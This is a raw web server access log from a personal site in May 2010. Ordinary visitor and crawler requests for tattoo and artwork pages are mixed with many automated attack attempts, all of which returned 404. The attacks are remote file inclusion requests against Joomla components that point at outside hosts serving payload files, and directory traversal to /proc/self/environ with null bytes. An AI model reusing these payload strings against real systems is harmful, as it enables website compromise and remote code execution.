24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:01 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:02 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:05:03 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
66.7.198.40 - - [30/May/2010:21:05:16 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
66.7.198.40 - - [30/May/2010:21:05:16 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.7.198.40 - - [30/May/2010:21:05:16 -0500] "GET /logs/access_log.1271635200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
67.195.112.180 - - [30/May/2010:21:05:18 -0500] "GET /logs/access_log.1165881600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.7.198.40 - - [30/May/2010:21:05:20 -0500] "GET /logs/access_log.1272326400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
24.22.42.203 - - [30/May/2010:21:06:03 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:03 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:04 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:18 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:18 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:18 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:06:18 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
94.136.63.119 - - [30/May/2010:21:07:23 -0500] "GET /logs/access_log.1271894400//estrutura/enquetes/config.inc.php?POLLDB[class]=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 345 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:21:07:23 -0500] "GET //estrutura/enquetes/config.inc.php?POLLDB[class]=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:21:07:23 -0500] "GET /logs//estrutura/enquetes/config.inc.php?POLLDB[class]=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
109.71.41.45 - - [30/May/2010:21:08:43 -0500] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [30/May/2010:21:08:43 -0500] "GET //index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
208.43.48.82 - - [30/May/2010:21:09:27 -0500] "GET /logs/protection.php?action=logout&siteurl=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:09:27 -0500] "GET /logs/protection.php?action=logout&siteurl=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:09:27 -0500] "GET /protection.php?action=logout&siteurl=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:09:27 -0500] "GET /protection.php?action=logout&siteurl=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:09:33 -0500] "GET /logs/protection.php?action=logout&siteurl=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:09:33 -0500] "GET /protection.php?action=logout&siteurl=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:10:13 -0500] "GET /logs/Category.php?basepath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 301 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:10:13 -0500] "GET /Category.php?basepath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:10:16 -0500] "GET /logs/Category.php?basepath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 301 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:10:16 -0500] "GET /Category.php?basepath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:10:18 -0500] "GET /logs/Category.php?basepath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 301 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:10:18 -0500] "GET /Category.php?basepath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 296 "-""libwww-perl/5.836"
174.121.58.89 - - [30/May/2010:21:11:28 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:21:11:28 -0500] "GET /logs/access_log.1262563200//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:21:11:28 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:21:11:53 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:21:11:53 -0500] "GET /logs/access_log.1262563200//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:21:11:53 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:21:11:55 -0500] "GET /logs/access_log.1270771200//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:21:12:27 -0500] "GET /logs/access_log.1270771200//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
216.15.238.210 - - [30/May/2010:21:13:24 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.15.238.210 - - [30/May/2010:21:13:24 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.15.238.210 - - [30/May/2010:21:13:25 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
208.43.48.82 - - [30/May/2010:21:13:48 -0500] "GET /logs/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:13:48 -0500] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 297 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:13:53 -0500] "GET /logs/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:13:53 -0500] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 297 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:14:05 -0500] "GET /logs/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:21:14:05 -0500] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 297 "-""libwww-perl/5.836"
207.46.204.190 - - [30/May/2010:21:14:26 -0500] "GET /logs/access_log.1156464000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.167.25 - - [30/May/2010:21:16:10 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:21:16:10 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:21:16:10 -0500] "GET /logs/access_log.1273363200%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
67.195.112.180 - - [30/May/2010:21:16:43 -0500] "GET /artwork/furniture-misc.htm HTTP/1.0" 200 1977 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.129.167.25 - - [30/May/2010:21:18:24 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:21:18:24 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:21:18:24 -0500] "GET /logs/access_log.1273363200%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:21 -0500] "GET /logs//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:21 -0500] "GET /logs/access_log.1270598400//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:21 -0500] "GET //components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:26 -0500] "GET /logs/access_log.1262563200//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:27 -0500] "GET //components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:27 -0500] "GET /logs//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:27 -0500] "GET /logs/access_log.1270598400//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
72.18.137.210 - - [30/May/2010:21:21:34 -0500] "GET /logs/access_log.1262563200//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
208.115.111.248 - - [30/May/2010:21:23:13 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:15 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:18 -0500] "GET /logs/access_log.1244678400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:20 -0500] "GET /logs/access_log.1244851200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:22 -0500] "GET /logs/access_log.1245110400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:24 -0500] "GET /logs/access_log.1245196800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:47 -0500] "GET /logs/access_log.1245369600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:51 -0500] "GET /logs/access_log.1245888000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [30/May/2010:21:23:54 -0500] "GET /logs/access_log.1245974400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [30/May/2010:21:24:08 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [30/May/2010:21:24:50 -0500] "GET /logs/access_log.1211932800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.99 - - [30/May/2010:21:24:56 -0500] "GET /logs/access_log.1175299200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [30/May/2010:21:25:44 -0500] "GET /logs/access_log.1245283200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [30/May/2010:21:28:09 -0500] "GET /costume/ HTTP/1.0" 200 640 "http://www.ringsworld.com/history/5.html""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.18.137.210 - - [30/May/2010:21:32:18 -0500] "GET /logs/access_log.1273017600//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.52.108.59 - - [30/May/2010:21:36:56 -0500] "GET /logs/access_log.1212969600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.18.137.210 - - [30/May/2010:21:37:43 -0500] "GET /logs/access_log.1273017600//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
91.121.201.191 - - [30/May/2010:21:38:00 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.803"
88.191.94.188 - - [30/May/2010:21:38:30 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 332 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:21:38:30 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 327 "-""Mozilla/5.0"
